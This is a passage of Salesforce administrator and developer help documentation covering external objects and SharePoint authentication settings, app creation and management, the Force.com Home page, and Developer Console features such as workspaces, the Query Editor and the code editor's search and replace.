a data source outside Salesforce, such as SharePoint®, and allows you to set up access to its data from search and custom tabs
in Salesforce. Each external object relies on the connection details stored in an external data source definition.

From Setup, click Develop > External Objects to display the External Objects list page, which shows the list of external
objects defined for your organization. From the list page:

• Click New External Object to manually define a new external object.

Tip:  If your data source supports it, we recommend that you use the external data source to automatically create
external object definitions by syncing.

• Click Edit to modify an existing external object.
• Click Del to delete an existing external object.
• Click the object name in the Label column to view or modify details about the external object.
• Click a source name in the External Data Source column to view or modify any details.

Note:  For SharePoint, when modifying object details, External Column Name must match the related Managed
Property Name. Other details such as field labels can be customized for Salesforce.

Storing External Authentication Settings — Beta
Store user names, passwords, and protocols for external data sources.

Available in: Enterprise, Unlimited, Developer Editions

User Permissions Needed

“Manage Users”To edit external authentication settings for other users:

Note: Sunlight Search, which lets you access SharePoint data in Salesforce via external objects, is currently available
as a beta feature. You can provide feedback and suggestions for Sunlight Search on the IdeaExchange. For information
on enabling this feature for your organization, contact salesforce.com.

External authentication settings let you store user names and passwords for external data sources such as SharePoint, along
with the required protocol. Unlike external data source definitions, which store only administrator credentials, these
authentication settings store credentials for any user who will access the external data from Salesforce.

1. Ensure that your Salesforce administrator has validated and synced an external data source that uses Per User authentication.
2. From Setup, click My Connected Data > My External Authentication Settings.
3. Click New or Edit to create or revise settings. Then set the following options:
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DescriptionField

An entry corresponding to the Name field in the external
data source definition.

External Data Source ID

The user’s full name.User

The protocol required by the external data source. For
SharePoint, select Basic Authentication.

Authentication Protocol

The credentials required by the external data source.Username and Password

See Also:
Integrating with SharePoint — Beta

Enabling User Access to External Data Sources — Beta
Set access to external data sources, such as SharePoint, using permission sets and user profiles.

Available in: Enterprise, Unlimited, Developer Editions

User Permissions Needed

“Manage Users”To edit permission sets and user profiles:

Note: Sunlight Search, which lets you access SharePoint data in Salesforce via external objects, is currently available
as a beta feature. You can provide feedback and suggestions for Sunlight Search on the IdeaExchange. For information
on enabling this feature for your organization, contact salesforce.com.

If an external data source uses Per User authentication, you can grant access to users through permission sets and profiles.

1. From Setup, click Manage Users > Permission Sets or Profiles.
2. Click the name of the permission set or profile you want to modify.
3. Do one of the following:

• For a permission set, click External Data Source Access in the Apps section. Then click Edit.
• For a profile, click Edit in the Enable External Data Source Access section.

4. Add the data sources you want to enable, or remove those you want disable, and click Save.

See Also:
Storing External Authentication Settings — Beta
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CREATING APPS

What is an App?
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view apps:

“Customize Application”To manage apps:

An “app” is a group of tabs that works as a unit to provide application functionality. Salesforce provides standard apps such
as Sales and Call Center. You can customize the standard apps to match the way you work.

You can also build your own on-demand apps by grouping standard and custom tabs into new custom apps. A custom app
consists of a label, a description, and an ordered list of tabs. You can also set custom logos for your custom apps. With custom
apps, you can extend the kinds of information that you manage and share online beyond CRM. Custom apps are part of the
Force.com platform that allows you to create and share custom applications with other Salesforce users.

Your available custom apps are listed in the Force.com app menu, which is a drop-down list that displays at the top of every
Salesforce page. When you choose an app from the Force.com app menu, your screen changes to reflect the contents of that
app. For example, if you switch from an app that contains the Opportunities tab to another app that does not, the Opportunities
tab disappears, and the Opportunity option no longer appears in the Create New drop-down list in the sidebar. In addition,
the app might display a different initial or default landing tab when selected.

Apps are associated with profiles. Profiles control which tabs you can see or hide, as well as which apps are available to you.
You can personalize the tabs in your apps as much as your profile allows.

Note:

• Service Cloud console apps are custom apps.

• For Salesforce Platform and Salesforce Platform One license users, the Platform standard app is the only app
listed in the Force.com app menu. For details about specifying a unique label for the Platform standard app, see
Creating Custom Apps on page 3525.

See Also:
Creating Custom Apps
Managing Apps
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Managing Apps
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view apps:

“Customize Application”To manage apps:

You can customize the standard, custom, and Connected Apps in your organization. From Setup, click Create > Apps to
display a list of your organization’s apps.

For standard and custom apps, you can do the following:

• To view details for an app, click the app name. This displays the properties of the app, such as which tabs are part of the
app, including any tabs that are not yet deployed. Click on custom tabs in the Included Tabs list to view details.

• To change the properties of an app, click Edit.
• To remove a custom app, click Del. Standard apps cannot be deleted.

• To create an app, do one of the following:

◊ If you’re new to Force.com apps, click Quick Start. With this option, you generate a basic working app in one simple
step.

◊ If you’ve already created the objects, tabs, and fields you need for your app, click New. With this option, you create an
app label and logo, add tabs, and assign the app to profiles.

• To change the order of apps in the Force.com app menu, click Reorder.

For Salesforce Platform and Salesforce Platform One license users, the Platform standard app is the only app listed in the
Force.com app menu.

For Connected Apps, you can see the version of the apps on your system. To modify an existing app, click the app name. To
create a new Connected App click New.

See Also:
What is an App?
Removing Apps

Creating Apps with App Quick Start
App quick start is a fast way to create a basic working app in just one step.

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions
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User Permissions Needed

“Customize Application” and “Manage Users”To create apps:

1. From Setup, click Create > Apps, and click Quick Start. Alternatively, from the Force.com Home page, click Add App
under Getting Started, or App Quick Start under Quick Links.

2. Enter the information needed for your app.

DescriptionField Name

The app's name that appears in the Force.com app menu.
The label can have a maximum of 40 characters, including
spaces.

App Label

The plural name of the object. This name appears on the
tab.

Plural Label

A name used to refer to the object in any user interface pages.Singular Label

If it's appropriate for your organization’s default language,
specify the gender of the label. This field appears if the
organization-wide default language expects gender.

Gender

If it's appropriate for your organization’s default language,
enable this option if your label should be preceded by “an”
instead of “a”.

Starts with a vowel sound

3. Click Create.
4. On the You’re All Set! page, click here to add new fields to your app.
5. To see your app as it will appear to users, click Go To My App.

The app quick start:

• Generates an app label and API name (a unique name that's used to refer to the object when using the Force.com API).
• Generates an object label and API name.
• Generates a tab label, and associates the tab with the object.
• Enables feed tracking for the object. Feed tracking lets people follow records of that object type and see Chatter feed

updates.
• Enables access to the app and tab in your user profile. Any users who have the “Modify All Data” permission can also

access the object.
• Generates a permission set that grants access to the new custom object.
• Assigns the permission set to the user who creates the app.

Once you've created an app, you can extend it with more components, specify access settings, and add users to your organization.

See Also:
App Quick Start: Next Steps for Building and Managing Apps
Managing Apps
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App Quick Start: Next Steps for Building and Managing Apps
Once you've created a basic working app with app quick start, you'll want to build out the app with more objects and fields,
define its access settings, and add users to share your app with them.

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create objects, tabs, fields, and validation rules:

“Manage Users”To create users and profiles:

1. Build out your app with the basic components used in apps.

• Create objects, which are custom database tables that allow you to store information specific to your app.
• Create tabs that are associated with the objects you've created.
• For each object, create fields to store the information that's important to your organization.
• Create validation rules, which verify that the data users enter meets the standards you specify before they save a record.

For quick shortcuts to these tools, use the Force.com quick access menu, which is available from object list view pages and
record detail pages.

2. Create user profiles or permission sets. These are collections of settings and permissions that determine what users can do
in an app.

3. Specify the types of access that users will have to the app.

a. Make your app visible using profiles or permission sets.
b. Make your object tabs visible.
c. Set the object permissions for the objects you created.

4. Add users to your organization. When adding users, be sure to assign them the appropriate profiles or permission sets you
created so they can access your app.

These are the basic steps for building and managing an app. As you explore the Force.com platform, you'll find even more
ways to build, manage, and deploy apps.

See Also:
Creating Apps with App Quick Start
Managing Apps
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Creating Custom Apps

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view apps:

“Customize Application”To manage apps:

Create custom apps to build applications for your users.

Note:  If you're new to Force.com apps, we recommend using Force.com quick start to create an app. With this tool,
you can generate a basic working app in just one step.

To create custom apps:

1. From Setup, click Create > Apps.
2. Click New.
3. If the Service Cloud console is available, select whether you want to define a custom app or a Service Cloud console.
4. Specify a label for the app. The label can have a maximum of 40 characters, including spaces. This label is the app’s name

in the Force.com app menu.
5. Optionally, enter a description of the app.
6. Click Next.
7. Optionally, specify a custom logo for the app. Click Insert an image to choose an image file from the document library.

Consider these requirements when choosing a custom app logo from the document library:

• The image must be in GIF or JPEG format and less than 20 KB in size.
• If the image is larger than 300 pixels wide by 55 pixels high, then it will be scaled to fit.
• For the best on-screen display, we recommend you use an image with a transparent background.
• The Externally Available checkbox must be selected on the document’s properties so that users can view the

image.

8. Click Next.
9. Click the left and right arrow buttons to add or remove tabs from the app.
10. Click the up and down arrow buttons to define the order in which the tabs will display in the app.
11. Optionally, set the default landing tab for your new app using the Default Landing Tab drop-down menu below the list

of selected tabs. This determines the first tab a user sees when logging into this app.
12. For Professional Edition users, click Save to finish the wizard. For Enterprise or Developer Edition users, click Next.
13. Check the Visible box to choose the user profiles for which the app will be available.
14. Check the Default box to set the app as that profile’s default app. This means that new users who have the profile will

see this app when they log in for the first time. Profiles with limits are excluded from this list.
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15. Click Save to finish the wizard.

See Also:
What is an App?
Managing Apps

Removing Apps

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To delete apps and objects:

You can remove custom apps, but not standard apps. Removing an app removes it from the Force.com apps menu, but doesn't
remove any associated objects. If you've created objects for an app, you may want to remove them as well.

1. From Setup, click Create > Apps.
2. Click Del next to the app.
3. Optionally, delete any associated objects.

Editing App Properties

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view apps:

“Customize Application”To manage apps:

You can change the properties of the standard and custom apps in your organization. For example, you can specify a custom
logo for a custom app, or you can specify which tabs are available in a standard or custom app. Note that you cannot change
the label, description, or logo for a standard app.

To edit the properties of an app:

1. From Setup, click Create > Apps.
2. Click Edit next to the app you want to modify.
3. Specify a label for the app. The label can have a maximum of 40 characters, including spaces. This label is the app’s name

in the Force.com app menu.
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4. Optionally, enter a description of the app.
5. Optionally, specify a custom logo for the app. Click Insert an image to choose an image file from the document library.

Consider these requirements when choosing a custom app logo from the document library:

• The image must be in GIF or JPEG format and less than 20 KB in size.
• If the image is larger than 300 pixels wide by 55 pixels high, then it will be scaled to fit.
• For the best on-screen display, we recommend you use an image with a transparent background.
• The Externally Available checkbox must be selected on the document’s properties so that users can view the

image.

6. Click the left and right arrow buttons to add or remove tabs from the app.
7. Click the up and down arrow buttons to define the order in which the tabs will display in the app.
8. Optionally, set the default landing tab for your new app using the Default Landing Tab drop-down menu below the

list of selected tabs. This determines the first tab a user sees when logging into this app.
9. Optionally, select the Overwrite users' personal custom app customizations checkbox to override any app

personalizations users may have made.
10. Check the Visible box to choose the user profiles for which the app will be available.
11. Check the Default box to set the app as that profile’s default app. This means that new users who have the profile will

see this app when they log in for the first time. Profiles with limits are excluded from this list.
12. Click Save.

See Also:
What is an App?
Managing Apps

Reordering the Force.com App Menu
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view apps:

“Customize Application”To manage apps:

You can change the order in which apps appear in the Force.com app menu. The Force.com app menu is a drop-down list
that displays at the top of every application page.

1. From Setup, do one of the following:

a. Click Create > Apps and then click Reorder.
b. Click Manage Apps > App Menu.

2. Click the arrows as desired to change the app order.
3. Click Save. The changes will take effect immediately.
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All the apps installed in the organization are shown for sorting. However, the apps that a user sees in the Force.com app menu
varies depending on each app’s visibility settings and the user’s permissions. For example, an administrator can typically see
more apps than a standard user. Connected Apps and service providers appear in the app menu only if they have a Start URL
value specified.

See Also:
What is an App?
Creating Custom Apps

Force.com Home Page Overview
The Force.com Home page contains options for building and managing applications.

Available in: All Editions except Database.com

User Permissions Needed

“Customize Application”To access the Force.com Home page:

You access the Force.com Home page from Setup. To return to this page from other setup pages, click Force.com Home in
the left sidebar.

• The left sidebar, which you can browse or search, provides access to all setup actions, tasks, and tools.

• The Getting Started box contains a tool for generating a basic app in a single step, and links to information about extending
and managing apps. This box doesn't appear if you've previously dismissed it.

• Recent Items List–Beta

Note:

This release contains a beta version of the Recent Items list that is production-quality but has known limitations.

The Recent Items box displays the following recent metadata items you’ve viewed, edited, or created, and their related
objects.

◊ Apex classes

◊ Apex triggers

◊ Apps

◊ Fields

◊ Objects

◊ Page layouts

◊ Permission sets

◊ Profiles

◊ Static resources

◊ Tabs

◊ Users
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◊ Validation rules

◊ Visualforce pages

◊ Visualforce components

Note:  The Recent Items list on the Force.com Home page is independent of the Recent Items section in the
sidebar column of most Salesforce pages. The Recent Items list on the Force.com Home page displays items used
by administrators, while the Recent Items section in the sidebar column displays records that end users have
worked with.

• The System Overview messages box displays messages to remind you when your organization reaches its usage limits. The
System Overview messages box is not enabled by default.

• The Quick Links box provides links for managing tools, users, apps, security and data.

• The Community box showcases available resources. This box doesn't appear if you've previously dismissed it. It reappears
with each new release; click Dismiss to hide it again.

• The right pane includes external links that are useful for developers and administrators.

Configuring Force.com System Overview Messages
Available in: All Editions except Personal and Database.com

User Permissions Needed

“Customize Application”To configure Force.com messages:

Note:  The system overview page shows only the items enabled for your organization. For example, your system
overview page shows workflow rules only if workflow is enabled for your organization.

Add system overview usage messages to the Force.com Home page to remind you when your organization approaches its
limits. You can expand, collapse, and dismiss the system overview messages that appear on the Force.com Home page. By
default, the system overview home page messages are enabled.

To configure the system overview messages on the Force.com Home page:

1. From Setup, click System Overview.
2. Click Configure Force.com Messages.
3. Select or deselect the types of system overview messages to show or hide on the Force.com Home page.
4. Click OK.

Important:  System overview messages only appear on the Force.com Home page when your organization approaches
its limits.

When you enable or dismiss system overview messages on the Force.com Home page, it only impacts your individual view of
the system overview messages.
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Consider Testing in a Sandbox
Salesforce.com provides sandboxes for testing changes in an environment outside of your production organization.

Available in: Enterprise, Unlimited, and Database.com Editions

Sandboxes contain copies of your data, code, and configuration settings that are isolated from your production environment.
You can customize your organization and test applications in a sandbox, then deploy the changes to your production organization
when ready.

Consider using a sandbox for any customization or application development that alters data or requires user interaction, such
as workflows, merged data, triggers, custom buttons, or apps.

See Also:
Sandbox Overview

APPENDICES

Tip Sheets and Other Resources
In addition to online help, salesforce.com publishes printable documentation to help you learn about our features and successfully
administer Salesforce.

These documents include tip sheets, user guides, and other resources that describe the features and capabilities of Salesforce.
These documents are available as Adobe® PDF files. Adobe Reader® is required to open PDF files; to download the latest
version of Reader, go to www.adobe.com/products/acrobat/readstep2.html.

Customization
• Tips & Hints for Record Types
• Building Salesforce Custom Links
• Tips & Hints for Page Layouts and Field-Level Security
• Building Custom Objects, Tabs, and Related Lists
• Useful Validation Rules
• Creating Lookup Filters on Relationship Fields (Beta)
• Force.com Sites Implementation Guide
• Site.com Workbook
• Using Multiple Business Processes
• Visual Workflow Implementation Guide
• Cloud Flow Designer Workbook
• Setting Up the Translation Workbench
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Formulas
• Tips for Reducing Formula Size
• Formulas Quick Reference Guide
• Useful Formula Fields

Workflow and Approvals
• Workflow: Automating The Process
• Useful Workflow Rules
• Getting Started with Approval Processes
• Useful Approval Processes
• Email Approval Response

Videos for the Point & Click Administrator
In addition to online help, salesforce.com creates video demos to help you learn about our features and successfully administer
Salesforce.

Force.com

For
Administrators

For End UsersVideo Title

Creating a Workflow Rule (2:50 minutes)

Quick demo of how to create a workflow rule in Salesforce.

Visual Workflow Cloud Flow Designer Overview (2:27 minutes)

This demo gives you an overview of Visual Workflow's Cloud Flow Designer, the
tool for creating flows. With the Salesforce Cloud Flow Designer, you can configure
screens and define branching logic for your flows, completely within Salesforce,
without writing any code.

Building a Simple Flow (3:30 minutes)

Follow along as we create a simple two-screen pledge flow using user input fields
and choices. We'll collect users' information, ask them to choose a pledge level,
then thank them for their donation.

Site.com

For
Administrators

For End UsersVideo Title

Building a Website with Site.com (3:02 minutes)
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For
Administrators

For End UsersVideo Title

Learn how to import assets to use in your site, create page templates, apply CSS
styles, and add and duplicate site pages using Site.com Studio.

Editing and Managing Content with Site.com (2:53 minutes)

Learn how to update the content of your website, import files, edit and format text,
and add images and links using Site.com Studio.
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Welcome, Salesforce Developers
This documentation provides information about enhancing your Salesforce organization by developing custom applications
and integrating your external applications.

This documentation is organized by task so you can quickly find the information you need:

• Writing Code—Write code using the Apex programming language to add business logic or use the Visualforce markup
language to create the user interface. In addition, you’ll find information about integrating your application using APIs
and authenticating your external applications.

• Debugging Your Code—Debug your application using the Developer Console.

• Testing Your Changes—Test your Apex code and work with the test tools.

• Deploying Changes—Deploy your changes to another organization using change sets and other tools.

For the complete set of developer documentation, see http://wiki.developerforce.com/page/Documentation.

Salesforce Development Tools
The available tools vary according to which Salesforce Edition you have.

This table summarizes the functionality of the various Salesforce development tools.

Available FromDeployTestDebugCodeTool

<Your name> menuForce.com Developer Console

developerforce.comForce.com IDE

Setup or My SettingsVisualforce development mode footer

SetupCode editor

SetupApex Test Execution

SetupChange Sets

SetupForce.com Migration Tool

ENHANCE SALESFORCE WITH CODE
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Note:  The Force.com IDE is a free resource provided by salesforce.com to support its users and partners, but is not
considered part of our Services for purposes of the salesforce.com Master Subscription Agreement.

See Also:
DeveloperForce Tools Page
Using the Developer Console
Using Tools for Developing and Deploying Apex
Enabling Development Mode

CODE

Writing Code
This section contains information about writing code to extend your organization.

• Using the Developer Console

• Securing Your Code

• Query Editor

• Working With Code

• Integrating Your Apps with Salesforce

See Also:
Debugging Your Code
Testing Your Changes
Deploying Changes
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DEVELOPER CONSOLE

Developer Console User Interface Overview
The Developer Console includes a collection of useful tools for coding, debugging, and testing applications.

The Developer Console is organized into the following sections:

1. Menubar
2. Workspace with a tab for each open item
3. Logs, Tests, and Problems panel

Menubar

The menubar includes the following drop-down menus:

• The File menu allows you to open and create resources.
• The Debug menu provides access to a range of tools and settings.
• The Test menu provides access to testing tools.
• The Workspace menu allows you to choose and manage workspaces.
• The Help menu includes links to the online help, a reference page of shortcut keys and a collection of guided tours.
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Workspace

A workspace is a collection of resources represented by tabs in the main panel of the Developer Console. The detail view or
editor shown in each tab is determined by the type of resource open in the tab. For example, source code opens in the Source
Code Editor, logs open in the Log Inspector, and so on.

You can create a workspace for any group of resources that you use together to keep your work organized. For example, you
can create one workspace for source code and another for debug logs, switching between them as you code and test.
See Developer Console Workspaces.

Logs, Tests, and Problems Panel

The lower panel in the Developer Console includes a collection of useful tabs:

• The Logs tab displays available logs.
• The Tests tab displays available tests.
• The Checkpoints tab displays available checkpoints.
• The Query Editor tab allows you to execute a SOQL query on the data in your organization.
• The Progress tab displays all asynchronous requests in real time. To see only the operations that are in progress, select

Hide Finished Runs. To terminate any deployments that haven’t finished, click Cancel All Deployments. When you
terminate a deployment, a residual polling thread appears in the Progress tab with a short delay. Partial deployments are
not possible. To clear the polling task immediately, refresh the Developer Console.

• The Problems tab shows the details of compilation errors in the Source Code Editor. Changes you make are compiled
and validated in the background. While you’re editing code, an error indicator displays beside lines that contain errors.
Click a row in the Problems tab to jump to the line of code that caused the error.

Note:

After twenty minutes of inactivity, the Developer Console stops polling for new logs, test runs, and checkpoints. To
resume updates, click Debug > Resume Updating.

Keyboard shortcuts

To see a list of Developer Console keyboard shortcuts, click Help > Shortcut Keys or press CTRL+SHIFT+?.

See Also:
Using the Developer Console
File Menu
Debug Menu
Query Editor
Logs Tab
Checkpoints Tab
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Using the Developer Console
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

User Permissions Needed

“View All Data”To use the Developer Console:

“Author Apex”To execute anonymous Apex:

“Author Apex”To save changes to Apex classes and triggers:

“Customize Application”To save changes to Visualforce pages and components:    

What is the Developer Console?

The Developer Console is an integrated development environment with a collection of tools you can use to create, debug, and
test applications in your Salesforce organization.

To open the Developer Console, click <Your name> > Developer Console. For an introduction to the UI, see Developer
Console User Interface Overview. Go to developer.force.com for the latest news and information on Salesforce development.

How Do You Use the Developer Console?

The Developer Console can help with many of your development tasks:

Debugging and Troubleshooting

The Developer Console provides a convenient set of tools for efficiently tracking down logical issues.

• View Logs: Use the Logs tab to view a list of logs. Open logs in the Log Inspector. Log Inspector is a context-sensitive
execution viewer that shows the source of an operation, what triggered the operation, and what occurred afterward. Use
this tool to inspect debug logs that include database events, Apex processing, workflow, and validation logic.

• Set and View Checkpoints in Apex Code: Use the Developer Console to set checkpoints to identify the source of errors.
For example, if you want to understand why a certain request generates an error, you can review the execution, identify
the offending logic, and set a checkpoint. When you execute the process again, you can inspect the request at that specific
point to understand in detail how to improve your code. While the Developer Console can't pause execution like a traditional
debugger, it provides cloud developers much of the same visibility, and reduces the need to instrument code with
System.debug commands.

Editing and Navigating Source Code

The Developer Console allows you to browse, open, edit and create source code files.

• Browse Packages in Your Organization: Navigate the contents of packages created in your organization.
• View and Edit Apex Classes and Triggers: Open and edit Apex triggers and classes, and open a read-only view of your

custom object definitions.
• View and Edit Visualforce Pages and Components: Open and edit Visualforce pages and components.
• Use the Source Code Editor: Open a working set of code files and switch between them with a single click. The Developer

Console Source Code Editor includes an auto-complete feature for Apex code.

Testing and Validating Performance

The Developer Console has a number of features dedicated to testing code and analyzing performance.
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• Test Apex Code: Use the Developer Console to check code coverage and run Apex tests, including unit tests, functional
tests, regression tests, and so on. To facilitate the development of robust, error-free code, Apex supports the creation and
execution of unit tests. Unit tests are class methods that verify whether a particular piece of code is working properly. Unit
test methods take no arguments, commit no data to the database, send no emails, and are flagged with the testMethod
keyword or the isTest annotation in the method definition. Also, test methods must be defined in test classes, that is,
classes annotated with isTest.

• Inspect Logs for Performance Issues: Log Inspector is a context-sensitive execution viewer that shows the source of an
operation, what triggered the operation, and what occurred afterward. Use this tool to inspect debug logs that include
database events, Apex processing, workflow, and validation logic.  Open a debug log and view the aggregated performance
of an operation in the Performance Tree. The Executed Units panel breaks up the request both by time and type, and
categorizes the timings by methods, queries, workflows, callouts, DML, validations, triggers, and pages, giving you a clear
idea of where to find performance issues. Use the Timeline panel to see a timeline view of the overall request and walk
through the events for a given block. The Limits panel provides a summary view of resources used and maps them against
your allocated request limits.

Executing SOQL Queries

The Developer Console provides a simple interface for managing SOQL queries.

• Edit and Execute SOQL Queries: Use the Query Editor to query data from your organization.
• View Query Results: Results are displayed in a Query Results grid that allows you to open, create, update, and delete

records.

See Also:
Developer Console User Interface Overview
File Menu
Logs Tab
Examples of Using the Log Inspector

Developer Console Command Line Reference
To open or close the Developer Console Command Line Window, click CTRL+L. The following commands are available:

DescriptionParametersCommand

A list of all commands.Nonecommands

Executes the <Apex statements> and
generates a log.

<Apex statements>: One or more
Apex statements.

exec <Apex statements>

-o: Opens the Enter Apex Code
window.

-r: Executes the code in the Enter Apex
Code window and generates a log.

Noneexec [-o | -r]

Searches the log for a string.<string>: A string of characters.find <string>

Explains how to get information about
commands.

Nonehelp

3538

Developer Console Command Line ReferenceDeveloper Console



Displays the description of the command.<command>: A Command Line Window
command.

man <command>

Developer Console Workspaces
A workspace is a collection of resources represented by tabs in the main panel of the Developer Console. The detail view or
editor shown in each tab is determined by the type of resource open in the tab. For example, source code opens in the Source
Code Editor, logs open in the Log Inspector, and so on.

You can create a workspace for any group of resources that you use together to keep your work organized. For example, you
can create one workspace for source code and another for debug logs, switching between them as you code and test.

The Workspace menu includes all the necessary links:

• Switch Workspace: Allows you to select from your saved workspaces.

• New Workspace: Creates a new workspace. Enter a name for the workspace and click OK. Open the resources that you
want in the workspace. The workspace will be saved when you switch to a different workspace or close the Developer
Console.

• Rename Current Workspace: Overwrites the current workspace with the name you enter.

• Workspace Manager: Opens a popup window that allows you to browse, open, create, and delete workspaces.

You can open the following types of resources in the Developer Console workspace:

• Logs open in the Log Inspector.

• Checkpoints open in the Checkpoint Inspector.

• Apex classes and triggers, and Visualforce pages and components open in the Source Code Editor.

• Organization metadata and other non-code resources open in the Object Inspector.

• Query results listed on the Query Editor tab open in an editable Query Results grid.

• Finished test runs listed on the Tests tab open in a Test Results view.

To collapse unused panels, use the  buttons. When collapsed, you can click a panel to temporarily reveal and use
it. When your cursor moves out of the panel, it collapses automatically.

When you switch to a different workspace or close the Developer Console, the state of the tabs (and the panels within the
tabs) in the current workspace is saved. If you have not created a workspace, the configuration is saved as the Default workspace.

Navigating Between Tabs

To move left and right through tabs in the workspace, click the appropriate tab or use the following keyboard shortcuts:

• Left: CTRL+Page Up
• Right: CTRL+Page Down

Navigating View History

To move backward and forward through your view history, click the  buttons or use the following keyboard shortcuts:

• Backward: CTRL+,
• Forward: CTRL+.
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Clicking  (or CTRL+) moves through the previously viewed tabs in the order that you viewed them. The  button
only becomes active when you are viewing your history.

See Also:
Developer Console User Interface Overview
Source Code Editor

File Menu
The Developer Console File menu allows you to manage your Apex triggers and classes, and Visualforce pages and components.
It includes the following options:

• New: Creates a new Apex class or trigger, or Visualforce page or component and opens it in the Source Code Editor. To
create a new Apex trigger, first select the object to associate with the trigger.

• Open: Launches a File Open window that allows you to browse and open your application code and data objects.
• Open Log: Opens the selected log in the Log Inspector. You can also access logs from the Logs tab.
• Open Raw Log: Opens the selected log in plain text.
• Download Log: Saves a text copy of the selected log to your local machine.
• Save: Saves the item in the active tab.
• Save All: Saves changes in all the tabs open in your workspace. Use this option to save a set of dependent changes.
• Delete: Deletes the item in the active tab. You can only delete Apex classes, triggers, and Visualforce pages.
• Close: Closes the active tab.
• Close All: Closes all the tabs open in your workspace. If any tab contains unsaved changes, you’ll be prompted to save

them.

See Also:
Using the File Open Window
Source Code Editor
Object Inspector
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Using the File Open Window
The File > Open window in the Developer Console menu allows you to browse and open your application code and data
objects.

To navigate to an item in the Open window:

1. In the Setup Entity Type column, click the type of the item you want to find.
2. In the Entities column, scroll and find the item you'd like to examine.

To filter the displayed items, click the Filter text entry box and enter a text string to display only items that match the
filter criteria. The search is case-sensitive.

3. To see related items in the Related column, click the item once.
For example, click an object to see the Apex classes that use it.

4. To open the item in a new tab, double-click it or select it and click Open.

Code files open in the Source Code Editor, while data objects open in Object Inspector view.

You can browse and open the contents of packages in your organization in the File > Open window. You can see the complete
contents of packages and open the code files and custom objects contained in a package, but other package items, such as
custom fields and validation rules, can be seen in the list but not viewed in detail.

Note:  You can’t view or edit the contents of managed packages you’ve installed into your organization. You can
browse, open, and edit the entities of unmanaged packages just like those you’ve created yourself.

See Also:
Source Code Editor
Log Inspector
Object Inspector

Debug Menu
The Developer Console Debug menu allows you to manage your logs and execute anonymous Apex. It includes the following
options:

• Open Execute Anonymous Window: Opens a new window that allows you to enter Apex code for testing. See Executing
Anonymous Apex Code.
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• Execute Last: Executes the most recent entry in the Enter Apex Code window.
• Switch Perspective: Selects the perspective from the list of available standard and custom perspectives. See Log Inspector.
• View Log Panels: Displays a list of available panels for use in a perspective.
• Perspective Manager: Opens the Perspective Manager. See Managing Perspectives in the Log Inspector.
• Save Perspective: Saves any changes you’ve made to the current perspective since it was open.
• Save Perspective As: Saves a copy of the current perspective with a different name.
• Auto-Hide Logs: Select this option to clear existing logs when the page is refreshed.
• Show My Current Logs Only: Deselect this option (selected by default) to see all logs saved for your organization, including

newly-generated logs created by other users.
• Show My Current Checkpoints Only: Deselect this option (selected by default) to display all checkpoints currently saved

for your organization, including newly-generated ones created by other users.
• Clear: Select Log Panel, Checkpoint Results Panel, or Checkpoint Locations to erase current data from the cache and

refresh the display.
• Resume Updating: Renews the connection to the server. This option is only shown if polling has been interrupted due to

inactivity.
• Change Log Levels: Opens the log settings dialog to define logging levels for future requests. See Setting Debug Log

Filters.

Note:  Some options in the Debug menu are not accessible until a log has been generated.

See Also:
Executing Anonymous Apex Code
Log Inspector
Managing Perspectives in the Log Inspector
Setting Debug Log Filters

WORKING WITH DATA

Query Editor
The Query Editor in the Developer Console allows you to execute a SOQL query on the data in your organization. Results
are displayed in a Query Results grid that allows you to open, create, update, and delete records.
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Executing a SOQL Query

To execute a SOQL query:

1. Enter a SOQL query in the Query Editor panel.
2. Click Execute. If the query generates errors, they are displayed in the bottom section of the Query Editor panel. The

results are displayed in the Query Results grid in the Developer Console workspace.

3. To rerun a query, click Refresh Grid.

Warning:  If you click Refresh Grid, any data that you’ve edited in the Query Results grid but haven’t saved will
be lost.

Managing Data in Query Results

The Query Results grid displays each record as a row, and allows you to create, update, and delete records without leaving the
Developer Console.

• To open a record shown in the results, click the row and click Open Detail Page, or Edit Page to jump to the record in
Salesforce.

• To create a new record, click Insert Row. Make any necessary changes and click Save Rows.

Note:  To insert a row, the query results must contain all the required fields for the object and the required fields
must be simple text or number fields. If these conditions aren’t true, a blank row is created but you can’t save it.
In this case, click Create New to create a new record in Salesforce.

• To edit a record, double-click on the related row. Make any necessary changes and click Save Rows.
• To delete a record, select the related row and click Delete Row.

See Also:
Using the Developer Console
Force.com SOQL and SOSL Reference
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APEX AND VISUALFORCE

Working With Code
This section contains information about the tools and techniques you can use when making changes to your organization by
using code.

• Using the Editor for Visualforce

• Source Code Editor

• Object Inspector

• Understanding Global Variables

• Valid Values for the $Action Global Variable

• Apex Code Overview

• Visualforce Overview

• What are Email Services?

• Custom Labels Overview

• About S-Controls

Using the Editor for Visualforce  or Apex
Apex is available in: Unlimited, Developer, Enterprise, and Database.com Editions

Visualforce is available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To edit Visualforce markup:

“Author Apex”To edit custom Visualforce controllers or Apex

When editing Visualforce or Apex, either in the Visualforce development mode footer or from Setup, an editor is available
with the following functionality:

Syntax highlighting

The editor automatically applies syntax highlighting for keywords and all functions and operators.

Search ( )

Search enables you to search for text within the current page, class, or trigger. To use search, enter a string in the Search
textbox and click Find Next.
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• To replace a found search string with another string, enter the new string in the Replace textbox and click replace
to replace just that instance, or Replace All to replace that instance and all other instances of the search string that
occur in the page, class, or trigger.

• To make the search operation case sensitive, select the Match Case option.

• To use a regular expression as your search string, select the Regular Expressions option. The regular expressions
follow JavaScript's regular expression rules. A search using regular expressions can find strings that wrap over more
than one line.

If you use the replace operation with a string found by a regular expression, the replace operation can also bind regular
expression group variables ($1, $2, and so on) from the found search string. For example, to replace an <h1> tag
with an <h2> tag and keep all the attributes on the original <h1> intact, search for <h1(\s+)(.*)> and replace it
with <h2$1$2>.

Go to line ( )

